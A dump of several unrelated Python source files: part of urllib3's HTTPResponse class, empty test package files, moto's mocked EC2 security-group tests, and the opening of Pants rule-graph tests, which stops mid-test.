return self._fp_bytes_read
def read(self, amt=None, decode_content=None, cache_content=False):
"""
Similar to :meth:`httplib.HTTPResponse.read`, but with two additional
parameters: ``decode_content`` and ``cache_content``.
:param amt:
How much of the content to read. If specified, caching is skipped
because it doesn't make sense to cache partial content as the full
response.
:param decode_content:
If True, will attempt to decode the body based on the
'content-encoding' header.
:param cache_content:
If True, will save the returned data such that the same result is
returned despite of the state of the underlying file object. This
is useful if you want the ``.data`` property to continue working
after having ``.read()`` the file object. (Overridden if ``amt`` is
set.)
"""
# Note: content-encoding value should be case-insensitive, per RFC 2616
# Section 3.5
content_encoding = self.headers.get('content-encoding', '').lower()
if self._decoder is None:
if content_encoding in self.CONTENT_DECODERS:
self._decoder = _get_decoder(content_encoding)
if decode_content is None:
decode_content = self.decode_content
if self._fp is None:
return
flush_decoder = False
try:
if amt is None:
# cStringIO doesn't like amt=None
data = self._fp.read()
flush_decoder = True
else:
cache_content = False
data = self._fp.read(amt)
if amt != 0 and not data: # Platform-specific: Buggy versions of Python.
# Close the connection when no data is returned
#
# This is redundant to what httplib/http.client _should_
# already do. However, versions of python released before
# December 15, 2012 (http://bugs.python.org/issue16298) do not
# properly close the connection in all cases. There is no harm
# in redundantly calling close.
self._fp.close()
flush_decoder = True
self._fp_bytes_read += len(data)
try:
if decode_content and self._decoder:
data = self._decoder.decompress(data)
except (IOError, zlib.error) as e:
raise DecodeError(
"Received response with content-encoding: %s, but "
"failed to decode it." % content_encoding,
e)
if flush_decoder and decode_content and self._decoder:
buf = self._decoder.decompress(binary_type())
data += buf + self._decoder.flush()
if cache_content:
self._body = data
return data
finally:
if self._original_response and self._original_response.isclosed():
self.release_conn()
def stream(self, amt=2**16, decode_content=None):
"""
A generator wrapper for the read() method. A call will block until
``amt`` bytes have been read from the connection or until the
connection is closed.
:param amt:
How much of the content to read. The generator will return up to
much data per iteration, but may return less. This is particularly
likely when using compressed data. However, the empty string will
never be returned.
:param decode_content:
If True, will attempt to decode the body based on the
'content-encoding' header.
"""
while not is_fp_closed(self._fp):
data = self.read(amt=amt, decode_content=decode_content)
if data:
yield data
@classmethod
def from_httplib(ResponseCls, r, **response_kw):
"""
Given an :class:`httplib.HTTPResponse` instance ``r``, return a
corresponding :class:`urllib3.response.HTTPResponse` object.
Remaining parameters are passed to the HTTPResponse constructor, along
with ``original_response=r``.
"""
# Normalize headers between different versions of Python
headers = {}
for k, v in r.getheaders():
# Python 3: Header keys are returned capitalised
k = k.lower()
has_value = headers.get(k)
if has_value: # Python 3: Repeating header keys are unmerged.
v = ', '.join([has_value, v])
headers[k] = v
# HTTPResponse objects in Python 3 don't have a .strict attribute
strict = getattr(r, 'strict', 0)
return ResponseCls(body=r,
headers=headers,
status=r.status,
version=r.version,
reason=r.reason,
strict=strict,
original_response=r,
**response_kw)
# Backwards-compatibility methods for httplib.HTTPResponse
def getheaders(self):
return self.headers
def getheader(self, name, default=None):
return self.headers.get(name, default)
# Overrides from io.IOBase
def close(self):
if not self.closed:
self._fp.close()
@property
def closed(self):
if self._fp is None:
return True
elif hasattr(self._fp, 'closed'):
return self._fp.closed
elif hasattr(self._fp, 'isclosed'): # Python 2
return self._fp.isclosed()
else:
return True
def fileno(self):
if self._fp is None:
raise IOError("HTTPResponse has no file to get a fileno from")
elif hasattr(self._fp, "fileno"):
return self._fp.fileno()
else:
raise IOError("The file-like object this HTTPResponse is wrapped "
"around has no file descriptor")
def flush(self):
if self._fp is not None and hasattr(self._fp, 'flush'):
return self._fp.flush()
def readable(self):
return True
|
Gadal/sympy
|
refs/heads/master
|
sympy/diffgeom/tests/__init__.py
|
12133432
| |
lz199144/python
|
refs/heads/master
|
neo1218/0023/web/tests/__init__.py
|
12133432
| |
gjtempleton/moto
|
refs/heads/master
|
tests/test_ec2/test_security_groups.py
|
4
|
from __future__ import unicode_literals
import copy
# Ensure 'assert_raises' context manager support for Python 2.6
import tests.backport_assert_raises # noqa
from nose.tools import assert_raises
import boto3
import boto
from botocore.exceptions import ClientError
from boto.exception import EC2ResponseError
import sure # noqa
from moto import mock_ec2, mock_ec2_deprecated
@mock_ec2_deprecated
def test_create_and_describe_security_group():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as ex:
security_group = conn.create_security_group(
'test security group', 'this is a test security group', dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set')
security_group = conn.create_security_group(
'test security group', 'this is a test security group')
security_group.name.should.equal('test security group')
security_group.description.should.equal('this is a test security group')
# Trying to create another group with the same name should throw an error
with assert_raises(EC2ResponseError) as cm:
conn.create_security_group(
'test security group', 'this is a test security group')
cm.exception.code.should.equal('InvalidGroup.Duplicate')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
all_groups = conn.get_all_security_groups()
# The default group gets created automatically
all_groups.should.have.length_of(3)
group_names = [group.name for group in all_groups]
set(group_names).should.equal(set(["default", "test security group"]))
@mock_ec2_deprecated
def test_create_security_group_without_description_raises_error():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as cm:
conn.create_security_group('test security group', '')
cm.exception.code.should.equal('MissingParameter')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_default_security_group():
conn = boto.ec2.connect_to_region('us-east-1')
groups = conn.get_all_security_groups()
groups.should.have.length_of(2)
groups[0].name.should.equal("default")
@mock_ec2_deprecated
def test_create_and_describe_vpc_security_group():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = 'vpc-5300000c'
security_group = conn.create_security_group(
'test security group', 'this is a test security group', vpc_id=vpc_id)
security_group.vpc_id.should.equal(vpc_id)
security_group.name.should.equal('test security group')
security_group.description.should.equal('this is a test security group')
# Trying to create another group with the same name in the same VPC should
# throw an error
with assert_raises(EC2ResponseError) as cm:
conn.create_security_group(
'test security group', 'this is a test security group', vpc_id)
cm.exception.code.should.equal('InvalidGroup.Duplicate')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
all_groups = conn.get_all_security_groups(filters={'vpc_id': [vpc_id]})
all_groups[0].vpc_id.should.equal(vpc_id)
all_groups.should.have.length_of(1)
all_groups[0].name.should.equal('test security group')
@mock_ec2_deprecated
def test_create_two_security_groups_with_same_name_in_different_vpc():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = 'vpc-5300000c'
vpc_id2 = 'vpc-5300000d'
conn.create_security_group(
'test security group', 'this is a test security group', vpc_id)
conn.create_security_group(
'test security group', 'this is a test security group', vpc_id2)
all_groups = conn.get_all_security_groups()
all_groups.should.have.length_of(4)
group_names = [group.name for group in all_groups]
# The default group is created automatically
set(group_names).should.equal(set(["default", "test security group"]))
@mock_ec2_deprecated
def test_deleting_security_groups():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group1 = conn.create_security_group('test1', 'test1')
conn.create_security_group('test2', 'test2')
conn.get_all_security_groups().should.have.length_of(4)
# Deleting a group that doesn't exist should throw an error
with assert_raises(EC2ResponseError) as cm:
conn.delete_security_group('foobar')
cm.exception.code.should.equal('InvalidGroup.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Delete by name
with assert_raises(EC2ResponseError) as ex:
conn.delete_security_group('test2', dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the DeleteSecurityGroup operation: Request would have succeeded, but DryRun flag is set')
conn.delete_security_group('test2')
conn.get_all_security_groups().should.have.length_of(3)
# Delete by group id
conn.delete_security_group(group_id=security_group1.id)
conn.get_all_security_groups().should.have.length_of(2)
@mock_ec2_deprecated
def test_delete_security_group_in_vpc():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = "vpc-12345"
security_group1 = conn.create_security_group('test1', 'test1', vpc_id)
# this should not throw an exception
conn.delete_security_group(group_id=security_group1.id)
@mock_ec2_deprecated
def test_authorize_ip_range_and_revoke():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group = conn.create_security_group('test', 'test')
with assert_raises(EC2ResponseError) as ex:
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the GrantSecurityGroupIngress operation: Request would have succeeded, but DryRun flag is set')
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32")
assert success.should.be.true
security_group = conn.get_all_security_groups(groupnames=['test'])[0]
int(security_group.rules[0].to_port).should.equal(2222)
security_group.rules[0].grants[
0].cidr_ip.should.equal("123.123.123.123/32")
# Wrong Cidr should throw error
with assert_raises(EC2ResponseError) as cm:
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", cidr_ip="123.123.123.122/32")
cm.exception.code.should.equal('InvalidPermission.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Actually revoke
with assert_raises(EC2ResponseError) as ex:
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the RevokeSecurityGroupIngress operation: Request would have succeeded, but DryRun flag is set')
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", cidr_ip="123.123.123.123/32")
security_group = conn.get_all_security_groups()[0]
security_group.rules.should.have.length_of(0)
# Test for egress as well
egress_security_group = conn.create_security_group(
'testegress', 'testegress', vpc_id='vpc-3432589')
with assert_raises(EC2ResponseError) as ex:
success = conn.authorize_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the GrantSecurityGroupEgress operation: Request would have succeeded, but DryRun flag is set')
success = conn.authorize_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32")
assert success.should.be.true
egress_security_group = conn.get_all_security_groups(
groupnames='testegress')[0]
# There are two egress rules associated with the security group:
# the default outbound rule and the new one
int(egress_security_group.rules_egress[1].to_port).should.equal(2222)
egress_security_group.rules_egress[1].grants[
0].cidr_ip.should.equal("123.123.123.123/32")
# Wrong Cidr should throw error
egress_security_group.revoke.when.called_with(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.122/32").should.throw(EC2ResponseError)
# Actually revoke
with assert_raises(EC2ResponseError) as ex:
conn.revoke_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the RevokeSecurityGroupEgress operation: Request would have succeeded, but DryRun flag is set')
conn.revoke_security_group_egress(
egress_security_group.id, "tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123/32")
egress_security_group = conn.get_all_security_groups()[0]
# There is still the default outbound rule
egress_security_group.rules_egress.should.have.length_of(1)
@mock_ec2_deprecated
def test_authorize_other_group_and_revoke():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group = conn.create_security_group('test', 'test')
other_security_group = conn.create_security_group('other', 'other')
wrong_group = conn.create_security_group('wrong', 'wrong')
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", src_group=other_security_group)
assert success.should.be.true
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test'][0]
int(security_group.rules[0].to_port).should.equal(2222)
security_group.rules[0].grants[
0].group_id.should.equal(other_security_group.id)
# Wrong source group should throw error
with assert_raises(EC2ResponseError) as cm:
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", src_group=wrong_group)
cm.exception.code.should.equal('InvalidPermission.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Actually revoke
security_group.revoke(ip_protocol="tcp", from_port="22",
to_port="2222", src_group=other_security_group)
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test'][0]
security_group.rules.should.have.length_of(0)
@mock_ec2
def test_authorize_other_group_egress_and_revoke():
ec2 = boto3.resource('ec2', region_name='us-west-1')
vpc = ec2.create_vpc(CidrBlock='10.0.0.0/16')
sg01 = ec2.create_security_group(
GroupName='sg01', Description='Test security group sg01', VpcId=vpc.id)
sg02 = ec2.create_security_group(
GroupName='sg02', Description='Test security group sg02', VpcId=vpc.id)
ip_permission = {
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'UserIdGroupPairs': [{'GroupId': sg02.id, 'GroupName': 'sg02', 'UserId': sg02.owner_id}],
'IpRanges': []
}
sg01.authorize_egress(IpPermissions=[ip_permission])
sg01.ip_permissions_egress.should.have.length_of(2)
sg01.ip_permissions_egress.should.contain(ip_permission)
sg01.revoke_egress(IpPermissions=[ip_permission])
sg01.ip_permissions_egress.should.have.length_of(1)
@mock_ec2_deprecated
def test_authorize_group_in_vpc():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = "vpc-12345"
# create 2 groups in a vpc
security_group = conn.create_security_group('test1', 'test1', vpc_id)
other_security_group = conn.create_security_group('test2', 'test2', vpc_id)
success = security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", src_group=other_security_group)
success.should.be.true
# Check that the rule is accurate
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test1'][0]
int(security_group.rules[0].to_port).should.equal(2222)
security_group.rules[0].grants[
0].group_id.should.equal(other_security_group.id)
# Now remove the rule
success = security_group.revoke(
ip_protocol="tcp", from_port="22", to_port="2222", src_group=other_security_group)
success.should.be.true
# And check that it gets revoked
security_group = [
group for group in conn.get_all_security_groups() if group.name == 'test1'][0]
security_group.rules.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_all_security_groups():
conn = boto.connect_ec2()
sg1 = conn.create_security_group(
name='test1', description='test1', vpc_id='vpc-mjm05d27')
conn.create_security_group(name='test2', description='test2')
resp = conn.get_all_security_groups(groupnames=['test1'])
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups(filters={'vpc-id': ['vpc-mjm05d27']})
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups(filters={'vpc_id': ['vpc-mjm05d27']})
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups(filters={'description': ['test1']})
resp.should.have.length_of(1)
resp[0].id.should.equal(sg1.id)
resp = conn.get_all_security_groups()
resp.should.have.length_of(4)
@mock_ec2_deprecated
def test_authorize_bad_cidr_throws_invalid_parameter_value():
conn = boto.connect_ec2('the_key', 'the_secret')
security_group = conn.create_security_group('test', 'test')
with assert_raises(EC2ResponseError) as cm:
security_group.authorize(
ip_protocol="tcp", from_port="22", to_port="2222", cidr_ip="123.123.123.123")
cm.exception.code.should.equal('InvalidParameterValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_security_group_tagging():
conn = boto.connect_vpc()
vpc = conn.create_vpc("10.0.0.0/16")
sg = conn.create_security_group("test-sg", "Test SG", vpc.id)
with assert_raises(EC2ResponseError) as ex:
sg.add_tag("Test", "Tag", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateTags operation: Request would have succeeded, but DryRun flag is set')
sg.add_tag("Test", "Tag")
tag = conn.get_all_tags()[0]
tag.name.should.equal("Test")
tag.value.should.equal("Tag")
group = conn.get_all_security_groups("test-sg")[0]
group.tags.should.have.length_of(1)
group.tags["Test"].should.equal("Tag")
@mock_ec2_deprecated
def test_security_group_tag_filtering():
conn = boto.connect_ec2()
sg = conn.create_security_group("test-sg", "Test SG")
sg.add_tag("test-tag", "test-value")
groups = conn.get_all_security_groups(
filters={"tag:test-tag": "test-value"})
groups.should.have.length_of(1)
@mock_ec2_deprecated
def test_authorize_all_protocols_with_no_port_specification():
conn = boto.connect_ec2()
sg = conn.create_security_group('test', 'test')
success = sg.authorize(ip_protocol='-1', cidr_ip='0.0.0.0/0')
success.should.be.true
sg = conn.get_all_security_groups('test')[0]
sg.rules[0].from_port.should.equal(None)
sg.rules[0].to_port.should.equal(None)
@mock_ec2_deprecated
def test_sec_group_rule_limit():
ec2_conn = boto.connect_ec2()
sg = ec2_conn.create_security_group('test', 'test')
other_sg = ec2_conn.create_security_group('test_2', 'test_other')
# INGRESS
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(110)])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
sg.rules.should.be.empty
# authorize a rule targeting a different sec group (because this count too)
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
success.should.be.true
# fill the rules up the limit
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(99)])
success.should.be.true
# verify that we cannot authorize past the limit for a CIDR IP
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1', cidr_ip=['100.0.0.0/0'])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# EGRESS
# authorize a rule targeting a different sec group (because this count too)
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
# fill the rules up the limit
# remember that by default, when created a sec group contains 1 egress rule
# so our other_sg rule + 98 CIDR IP rules + 1 by default == 100 the limit
for i in range(98):
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='{0}.0.0.0/0'.format(i))
# verify that we cannot authorize past the limit for a CIDR IP
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='101.0.0.0/0')
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
@mock_ec2_deprecated
def test_sec_group_rule_limit_vpc():
ec2_conn = boto.connect_ec2()
vpc_conn = boto.connect_vpc()
vpc = vpc_conn.create_vpc('10.0.0.0/8')
sg = ec2_conn.create_security_group('test', 'test', vpc_id=vpc.id)
other_sg = ec2_conn.create_security_group('test_2', 'test', vpc_id=vpc.id)
# INGRESS
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(110)])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
sg.rules.should.be.empty
# authorize a rule targeting a different sec group (because this count too)
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
success.should.be.true
# fill the rules up the limit
success = ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
cidr_ip=['{0}.0.0.0/0'.format(i) for i in range(49)])
# verify that we cannot authorize past the limit for a CIDR IP
success.should.be.true
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1', cidr_ip=['100.0.0.0/0'])
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group(
group_id=sg.id, ip_protocol='-1',
src_security_group_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# EGRESS
# authorize a rule targeting a different sec group (because this count too)
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
# fill the rules up the limit
# remember that by default, when created a sec group contains 1 egress rule
# so our other_sg rule + 48 CIDR IP rules + 1 by default == 50 the limit
for i in range(48):
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='{0}.0.0.0/0'.format(i))
# verify that we cannot authorize past the limit for a CIDR IP
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
cidr_ip='50.0.0.0/0')
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
# verify that we cannot authorize past the limit for a different sec group
with assert_raises(EC2ResponseError) as cm:
ec2_conn.authorize_security_group_egress(
group_id=sg.id, ip_protocol='-1',
src_group_id=other_sg.id)
cm.exception.error_code.should.equal('RulesPerSecurityGroupLimitExceeded')
'''
Boto3
'''
@mock_ec2
def test_add_same_rule_twice_throws_error():
ec2 = boto3.resource('ec2', region_name='us-west-1')
vpc = ec2.create_vpc(CidrBlock='10.0.0.0/16')
sg = ec2.create_security_group(
GroupName='sg1', Description='Test security group sg1', VpcId=vpc.id)
ip_permissions = [
{
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'IpRanges': [{"CidrIp": "1.2.3.4/32"}]
},
]
sg.authorize_ingress(IpPermissions=ip_permissions)
with assert_raises(ClientError) as ex:
sg.authorize_ingress(IpPermissions=ip_permissions)
@mock_ec2
def test_security_group_tagging_boto3():
conn = boto3.client('ec2', region_name='us-east-1')
sg = conn.create_security_group(GroupName="test-sg", Description="Test SG")
with assert_raises(ClientError) as ex:
conn.create_tags(Resources=[sg['GroupId']], Tags=[
{'Key': 'Test', 'Value': 'Tag'}], DryRun=True)
ex.exception.response['Error']['Code'].should.equal('DryRunOperation')
ex.exception.response['ResponseMetadata'][
'HTTPStatusCode'].should.equal(400)
ex.exception.response['Error']['Message'].should.equal(
'An error occurred (DryRunOperation) when calling the CreateTags operation: Request would have succeeded, but DryRun flag is set')
conn.create_tags(Resources=[sg['GroupId']], Tags=[
{'Key': 'Test', 'Value': 'Tag'}])
describe = conn.describe_security_groups(
Filters=[{'Name': 'tag-value', 'Values': ['Tag']}])
tag = describe["SecurityGroups"][0]['Tags'][0]
tag['Value'].should.equal("Tag")
tag['Key'].should.equal("Test")
@mock_ec2
def test_authorize_and_revoke_in_bulk():
ec2 = boto3.resource('ec2', region_name='us-west-1')
vpc = ec2.create_vpc(CidrBlock='10.0.0.0/16')
sg01 = ec2.create_security_group(
GroupName='sg01', Description='Test security group sg01', VpcId=vpc.id)
sg02 = ec2.create_security_group(
GroupName='sg02', Description='Test security group sg02', VpcId=vpc.id)
sg03 = ec2.create_security_group(
GroupName='sg03', Description='Test security group sg03')
ip_permissions = [
{
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'UserIdGroupPairs': [{'GroupId': sg02.id, 'GroupName': 'sg02',
'UserId': sg02.owner_id}],
'IpRanges': []
},
{
'IpProtocol': 'tcp',
'FromPort': 27018,
'ToPort': 27018,
'UserIdGroupPairs': [{'GroupId': sg02.id, 'UserId': sg02.owner_id}],
'IpRanges': []
},
{
'IpProtocol': 'tcp',
'FromPort': 27017,
'ToPort': 27017,
'UserIdGroupPairs': [{'GroupName': 'sg03', 'UserId': sg03.owner_id}],
'IpRanges': []
}
]
expected_ip_permissions = copy.deepcopy(ip_permissions)
expected_ip_permissions[1]['UserIdGroupPairs'][0]['GroupName'] = 'sg02'
expected_ip_permissions[2]['UserIdGroupPairs'][0]['GroupId'] = sg03.id
sg01.authorize_ingress(IpPermissions=ip_permissions)
sg01.ip_permissions.should.have.length_of(3)
for ip_permission in expected_ip_permissions:
sg01.ip_permissions.should.contain(ip_permission)
sg01.revoke_ingress(IpPermissions=ip_permissions)
sg01.ip_permissions.should.be.empty
for ip_permission in expected_ip_permissions:
sg01.ip_permissions.shouldnt.contain(ip_permission)
sg01.authorize_egress(IpPermissions=ip_permissions)
sg01.ip_permissions_egress.should.have.length_of(4)
for ip_permission in expected_ip_permissions:
sg01.ip_permissions_egress.should.contain(ip_permission)
sg01.revoke_egress(IpPermissions=ip_permissions)
sg01.ip_permissions_egress.should.have.length_of(1)
for ip_permission in expected_ip_permissions:
sg01.ip_permissions_egress.shouldnt.contain(ip_permission)
@mock_ec2_deprecated
def test_get_all_security_groups_filter_with_same_vpc_id():
conn = boto.connect_ec2('the_key', 'the_secret')
vpc_id = 'vpc-5300000c'
security_group = conn.create_security_group(
'test1', 'test1', vpc_id=vpc_id)
security_group2 = conn.create_security_group(
'test2', 'test2', vpc_id=vpc_id)
security_group.vpc_id.should.equal(vpc_id)
security_group2.vpc_id.should.equal(vpc_id)
security_groups = conn.get_all_security_groups(
group_ids=[security_group.id], filters={'vpc-id': [vpc_id]})
security_groups.should.have.length_of(1)
|
foursquare/pants
|
refs/heads/master
|
tests/python/pants_test/engine/test_rules.py
|
1
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from builtins import object, str
from textwrap import dedent
from pants.engine.build_files import create_graph_rules
from pants.engine.fs import create_fs_rules
from pants.engine.mapper import AddressMapper
from pants.engine.rules import RootRule, RuleIndex, SingletonRule, TaskRule
from pants.engine.selectors import Get, Select
from pants.util.objects import Exactly
from pants_test.engine.examples.parsers import JsonParser
from pants_test.engine.examples.planners import Goal
from pants_test.engine.util import TargetTable, assert_equal_with_printing, create_scheduler
class AGoal(Goal):
@classmethod
def products(cls):
return [A]
class A(object):
def __repr__(self):
return 'A()'
class B(object):
def __repr__(self):
return 'B()'
class C(object):
def __repr__(self):
return 'C()'
class D(object):
def __repr__(self):
return 'D()'
def noop(*args):
pass
class SubA(A):
def __repr__(self):
return 'SubA()'
_suba_root_rules = [RootRule(SubA)]
class RuleIndexTest(unittest.TestCase):
def test_creation_fails_with_bad_declaration_type(self):
with self.assertRaises(TypeError) as cm:
RuleIndex.create([A()])
self.assertEquals("Unexpected rule type: <class 'pants_test.engine.test_rules.A'>."
" Rules either extend Rule, or are static functions decorated with @rule.",
str(cm.exception))
class RulesetValidatorTest(unittest.TestCase):
def test_ruleset_with_missing_product_type(self):
rules = _suba_root_rules + [TaskRule(A, [Select(B)], noop)]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(A, (Select(B),), noop):
no rule was available to compute B for subject type SubA
""").strip(),
str(cm.exception))
def test_ruleset_with_rule_with_two_missing_selects(self):
rules = _suba_root_rules + [TaskRule(A, [Select(B), Select(C)], noop)]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(A, (Select(B), Select(C)), noop):
no rule was available to compute B for subject type SubA
no rule was available to compute C for subject type SubA
""").strip(),
str(cm.exception))
def test_ruleset_with_selector_only_provided_as_root_subject(self):
rules = [RootRule(B), TaskRule(A, [Select(B)], noop)]
create_scheduler(rules)
def test_ruleset_with_superclass_of_selected_type_produced_fails(self):
rules = [
RootRule(C),
TaskRule(A, [Select(B)], noop),
TaskRule(B, [Select(SubA)], noop)
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 2
(A, (Select(B),), noop):
no rule was available to compute B for subject type C
(B, (Select(SubA),), noop):
no rule was available to compute SubA for subject type C
""").strip(),
str(cm.exception))
def test_ruleset_with_explicit_type_constraint(self):
rules = _suba_root_rules + [
TaskRule(Exactly(A), [Select(B)], noop),
TaskRule(B, [Select(A)], noop)
]
create_scheduler(rules)
def test_ruleset_with_failure_due_to_incompatible_subject_for_singleton(self):
rules = [
RootRule(A),
TaskRule(D, [Select(C)], noop),
SingletonRule(B, B()),
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
# This error message could note near matches like the singleton.
self.assert_equal_with_printing(dedent("""
Rules with errors: 1
(D, (Select(C),), noop):
no rule was available to compute C for subject type A
""").strip(),
str(cm.exception))
def test_not_fulfillable_duplicated_dependency(self):
# If a rule depends on another rule+subject in two ways, and one of them is unfulfillable
# Only the unfulfillable one should be in the errors.
rules = _suba_root_rules + [
TaskRule(B, [Select(D)], noop),
TaskRule(D, [Select(A), Select(SubA)], noop, input_gets=[Get(A, C)]),
TaskRule(A, [Select(SubA)], noop)
]
with self.assertRaises(Exception) as cm:
create_scheduler(rules)
self.assert_equal_with_printing(dedent("""
Rules with errors: 2
(B, (Select(D),), noop):
no rule was available to compute D for subject type SubA
(D, (Select(A), Select(SubA)), [Get(A, C)], noop):
no rule was available to compute A for subject type C
""").strip(),
str(cm.exception))
assert_equal_with_printing = assert_equal_with_printing
class RuleGraphMakerTest(unittest.TestCase):
# TODO something with variants
# TODO HasProducts?
def test_smallest_full_test(self):
rules = _suba_root_rules + [
RootRule(SubA),
TaskRule(Exactly(A), [Select(SubA)], noop)
]
